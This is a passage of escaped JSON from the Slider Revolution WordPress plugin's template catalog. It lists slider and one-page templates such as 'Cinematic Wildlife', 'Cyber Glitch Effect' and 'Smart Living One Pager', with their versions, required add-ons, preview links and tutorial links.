Estate Website [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-stunning-hero-slider-for-your-real-estate-website\\/\",\"guide_img\":\"tutorial\\/realestate-slider.png\",\"active\":\"1\",\"installed\":false},\"511\":{\"id\":\"556\",\"title\":\"Saas Product Slider\",\"alias\":\"saas-product-slider\",\"zip\":\"saas-product-slider.zip\",\"uid\":\"3cf7809058f383425c5409aa1204335f\",\"img\":\"saas-product-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/saas-product-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=saas-product-slider\",\"version\":\"1.0.0\",\"required\":\"6.4.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Present your digital SaaS product with a modern design and stunning animations.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-typewriter-addon\\\\\\/revslider-typewriter-addon.php\\\",\\\"name\\\":\\\"Typewriter AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/typewriter-addon\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-lottie-addon\\\\\\/revslider-lottie-addon.php\\\",\\\"name\\\":\\\"Slider Revolution Lottie AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-02-23 10:49:44\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"512\":{\"id\":\"557\",\"title\":\"Cinematic Wildlife Template\",\"alias\":\"cinematic-wildlife-template\",\"zip\":\"\",\"uid\":\"cinematic-wildlife-template\",\"img\":\"packages\\/cinematic-wildlife-package.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/cinematic-wildlife-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=cinematic-wildlife-slider\",\"version\":\"1.0.1\",\"required\":\"6.4.8\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">Easily create cinematic presentations with this photography-based slider, that features a convenient YouTube video popup.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2021-04-16 10:45:38\",\"package\":\"Cinematic Wildlife Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Beautiful Content Showcase for an Online Publication [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-beautiful-content-showcase-for-an-online-publication\\/\",\"guide_img\":\"tutorial\\/Cinematic-Wildlife.png\",\"active\":\"1\",\"package_id\":\"47\",\"installed\":false},\"513\":{\"id\":\"558\",\"title\":\"Cinematic Wildlife Slider\",\"alias\":\"cinematic-wildlife-slider\",\"zip\":\"packs\\/cinematic-wildlife-slider.zip\",\"uid\":\"a37b04e221a845d6d446f4d70e815b87\",\"img\":\"cinematic-wildlife-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/cinematic-wildlife-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=cinematic-wildlife-slider\",\"version\":\"1.0.1\",\"required\":\"6.4.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Easily create cinematic presentations with this photography-based slider, that features a convenient YouTube video popup.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2021-04-16 10:47:01\",\"package\":\"Cinematic Wildlife Template\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Beautiful Content Showcase for an Online Publication [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-beautiful-content-showcase-for-an-online-publication\\/\",\"guide_img\":\"tutorial\\/Cinematic-Wildlife.png\",\"active\":\"1\",\"package_id\":\"47\",\"installed\":false},\"514\":{\"id\":\"559\",\"title\":\"Cinematic Wildlife Modal\",\"alias\":\"cinematic-wildlife-modal\",\"zip\":\"packs\\/cinematic-wildlife-modal.zip\",\"uid\":\"636a6885199f684ad743167ceea70dc4\",\"img\":\"cinematic-wildlife-modal\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/cinematic-wildlife-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=cinematic-wildlife-slider\",\"version\":\"1.0.1\",\"required\":\"6.4.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Easily create cinematic presentations with this photography-based slider, that features a convenient YouTube video popup.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2021-04-16 10:50:56\",\"package\":\"Cinematic Wildlife Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"How to Create a Beautiful Content Showcase for an Online Publication [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-beautiful-content-showcase-for-an-online-publication\\/\",\"guide_img\":\"tutorial\\/Cinematic-Wildlife.png\",\"active\":\"1\",\"package_id\":\"47\",\"installed\":false},\"515\":{\"id\":\"560\",\"title\":\"Gaming Stats Presentation Slider\",\"alias\":\"gaming-stats-presentation-slider\",\"zip\":\"gaming-stats-presentation-slider.zip\",\"uid\":\"988df5050f2a45a108ef32518a725bf8\",\"img\":\"gaming-stats-presentation-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/charts-addon-presentation-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=charts-addon-presentation-slider\",\"version\":\"1.0.1\",\"required\":\"6.4.11\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Create interactive presentations and showcase statistics with unique and customizable charts<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-charts-addon\\\\\\/revslider-charts-addon.php\\\",\\\"name\\\":\\\"Charts AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-04-29 09:50:58\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Digital Report Teaser with Slider Revolution [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-digital-report-teaser-with-slider-revolution\\/\",\"guide_img\":\"tutorial\\/gaming-stats-presentation-slider.png\",\"active\":\"1\",\"installed\":false},\"516\":{\"id\":\"561\",\"title\":\"Coffee Shop Split Screen Slider\",\"alias\":\"coffee-flavours\",\"zip\":\"coffee-flavours.zip\",\"uid\":\"63726447a6a614d8f53fbf6024fd3033\",\"img\":\"coffee-flavors\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/coffee-shop-split-screen-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coffee-shop-split-screen-slider\",\"version\":\"1.0.1\",\"required\":\"6.5.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The animated elements and clean layout make this slider an eye-catcher for your coffee shop. With it\'s easy customizability, this template is perfect for showcasing any type of product!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2021-06-11 09:09:52\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"517\":{\"id\":\"562\",\"title\":\"Modern Portfolio Showreel Slider\",\"alias\":\"showreel-slider\",\"zip\":\"showreel-slider.zip\",\"uid\":\"bced29a585e67153a1ed7608ddcdb69d\",\"img\":\"showreel-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/modern-portfolio-showreel-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=modern-portfolio-showreel-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Showcase beautiful videos and photography with this clean looking slider with modern UI and effective typography. Perfect for any creative professional.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2021-06-11 09:14:43\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Add a Beautiful Video Background to Your Website [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-add-a-beautiful-video-background-to-your-website-tutorial\\/\",\"guide_img\":\"tutorial\\/showreel-slider.jpg\",\"active\":\"1\",\"installed\":false},\"518\":{\"id\":\"563\",\"title\":\"Visual Art Forms Slider\",\"alias\":\"visual-art-forms\",\"zip\":\"visual-art-forms.zip\",\"uid\":\"4d57a5abf20bc4a615fe30837ac3ce1a\",\"img\":\"visual-art-forms\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/visual-art-forms-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=visual-art-forms-slider\",\"version\":\"1.0.1\",\"required\":\"6.5.0\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Present just about anything with this highly flexible and modern looking slider, no matter what industry you are in.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2021-06-11 09:18:19\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"519\":{\"id\":\"564\",\"title\":\"Background Effect Hero\",\"alias\":\"bg-effect-hero\",\"zip\":\"bg-effect-hero.zip\",\"uid\":\"55bb0fa5ac66ad84423fa704b701e1df\",\"img\":\"bg-effect-hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/background-effect-hero-collection\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=background-effect-hero-collection\",\"version\":\"1.0.0\",\"required\":\"6.5.6\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">If you really want to stun your visitors with gorgeous gradients and dreamy transitions, <br \\/>\\r\\nthis slider \\/ hero module is exactly what you were looking for.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-particles-addon\\\\\\/revslider-particles-addon.php\\\",\\\"name\\\":\\\"Particles Effect AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-bubblemorph-addon\\\\\\/revslider-bubblemorph-addon.php\\\",\\\"name\\\":\\\"BubbleMorph AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-08-09 10:45:50\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Unique Gradient Background Design [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/gradient-background\\/\",\"guide_img\":\"tutorial\\/bg-effect-hero.png\",\"active\":\"1\",\"installed\":false},\"520\":{\"id\":\"565\",\"title\":\"Cyber Glitch Effect Slider\",\"alias\":\"cyberfunk\",\"zip\":\"cyberfunk.zip\",\"uid\":\"44fdc7e13074bdc46500972cd708c739\",\"img\":\"cyberfunk\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/cyber-glitch-effect-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=cyber-glitch-effect-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.6\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Dive into a futuristic, neon, cyber world with this amazing slider template featuring <br \\/>\\r\\nglitch effect transitions and a typewriter effect.<br \\/>\\r\\nThe custom navigation skin can be customized easily!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-typewriter-addon\\\\\\/revslider-typewriter-addon.php\\\",\\\"name\\\":\\\"Typewriter AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/typewriter-addon\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-08-09 10:51:54\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Futuristic-looking Website for a Tech Company [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-futuristic-looking-website-for-a-tech-company\\/\",\"guide_img\":\"tutorial\\/cyberfunk.jpg\",\"active\":\"1\",\"installed\":false},\"521\":{\"id\":\"566\",\"title\":\"Motion Blur Portfolio Showcase\",\"alias\":\"motion-blur-portfolio\",\"zip\":\"motion-blur-portfolio.zip\",\"uid\":\"28086bed49cfb241c7d40f91cd64e970\",\"img\":\"motion-blur-portfolio\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/motion-blur-portfolio-showcase\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=motion-blur-portfolio-showcase\",\"version\":\"1.0.1\",\"required\":\"6.5.6\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This clean showcase slider with an optional video popup is using a fancy motion blur transition!<br \\/>\\r\\nPacked with a logo and menu its ready to visualize your wildest ideas.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-08-09 10:56:33\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"A Different Way to Wow Shoppers with an eCommerce Product Slider [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/a-different-way-to-wow-shoppers-with-an-ecommerce-product-slider\\/\",\"guide_img\":\"tutorial\\/motion-blur-portfolio.jpg\",\"active\":\"1\",\"installed\":false},\"522\":{\"id\":\"567\",\"title\":\"Portal Effect Hero Slider\",\"alias\":\"portal-effect-hero\",\"zip\":\"portal-effect-hero.zip\",\"uid\":\"87f5b64e44dc5b75bc1c7adbeb287ee9\",\"img\":\"portal-effect-hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/portal-effect-hero-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=portal-effect-hero-slider\",\"version\":\"1.0.1\",\"required\":\"6.5.6\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">This slider module can function as an impressive landing page or a striking product presentation anywhere on your WordPress website.<br \\/>\\r\\nThe design already includes elements like a logo, menu and social media icons.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-08-09 11:08:18\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Demystifying the Slider Revolution Builder and Templates [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/demystifying-the-slider-revolution-builder-and-templates-tutorial\\/\",\"guide_img\":\"tutorial\\/portal-effect-hero.jpg\",\"active\":\"1\",\"installed\":false},\"523\":{\"id\":\"568\",\"title\":\"Winery Timeline Slider\",\"alias\":\"winery-timeline\",\"zip\":\"winery-timeline.zip\",\"uid\":\"d2ccdaf0a5c73db21e8e8a3f6712e8bd\",\"img\":\"winery-timeline\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/winery-timeline-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=winery-timeline-slider\",\"version\":\"1.0.0\",\"required\":\"6.5.6\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Tell your own story with this fabulous timeline slider.<br \\/>\\r\\nLogo and social icon design elements are already included if you want to use this template as a standalone landing page!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Revolution Base\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-08-09 11:13:39\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Vertical Slider Timeline That Tells Your Brand Story [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-vertical-slider-timeline-that-tells-your-brand-story\\/\",\"guide_img\":\"tutorial\\/winery-timeline.png\",\"active\":\"1\",\"installed\":false},\"524\":{\"id\":\"569\",\"title\":\"Smart Living One Pager V1\",\"alias\":\"smart-living-one-pager-v1\",\"zip\":\"\",\"uid\":\"smart-living-one-pager-v1\",\"img\":\"packages\\/Smart-Living-One-Pager-V1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v1\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v1\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-09-07 14:33:48\",\"package\":\"Smart Living One Pager V1\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"48\",\"installed\":false},\"525\":{\"id\":\"570\",\"title\":\"Smart Living One Pager V2\",\"alias\":\"smart-living-one-pager-v2\",\"zip\":\"\",\"uid\":\"smart-living-one-pager-v2\",\"img\":\"packages\\/Smart-Living-One-Pager-V2.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v2\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v2\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-09-07 14:38:21\",\"package\":\"Smart Living One Pager V2\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"49\",\"installed\":false},\"526\":{\"id\":\"571\",\"title\":\"Smart Living One Pager V3\",\"alias\":\"smart-living-one-pager-v3\",\"zip\":\"\",\"uid\":\"smart-living-one-pager-v3\",\"img\":\"packages\\/Smart-Living-One-Pager-V3.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v3\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v3\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-09-07 14:39:44\",\"package\":\"Smart Living One Pager V3\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"50\",\"installed\":false},\"527\":{\"id\":\"572\",\"title\":\"Menu 1\",\"alias\":\"menu-1\",\"zip\":\"packs\\/menu-1.zip\",\"uid\":\"6e5038d711f2ee8326c79c3a9e06ded4\",\"img\":\"menu-1\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v1\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v1\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 14:41:12\",\"package\":\"Smart Living One Pager V1\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"48\",\"installed\":false},\"528\":{\"id\":\"573\",\"title\":\"Hero 1\",\"alias\":\"onepage-hero-1\",\"zip\":\"packs\\/onepage-hero-1.zip\",\"uid\":\"9f5fec6956bd2e1e1ecc553a8b7471b0\",\"img\":\"onepage-hero-1\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v1\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v1\",\"version\":\"1.0.1\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2021-09-07 14:48:41\",\"package\":\"Smart Living One Pager V1\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"48\",\"installed\":false},\"529\":{\"id\":\"574\",\"title\":\"About 1\",\"alias\":\"about1\",\"zip\":\"packs\\/about1.zip\",\"uid\":\"fc4962093f61124101c05ceb506fa5d2\",\"img\":\"about1\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/smart-living-one-page-template-for-wordpress-v1\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=smart-living-one-page-template-for-wordpress-v1\",\"version\":\"1.0.0\",\"required\":\"6.5.8\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Never build a one pager from scratch again!<br>\\r\\nSlider Revolution for WordPress is a modular, fully visual content builder, that allows you to create pro-level one-pagers like this one in no time.<br>\\r\\n20 different \\\"Smart Living\\\" modules are included and come in 3 example page setups!<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2021-09-07 14:50:54\",\"package\":\"Smart Living One Pager V1\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"48\",\"installed\":false},\"530\":{\"id\":\"575\",\"title\":\"Services 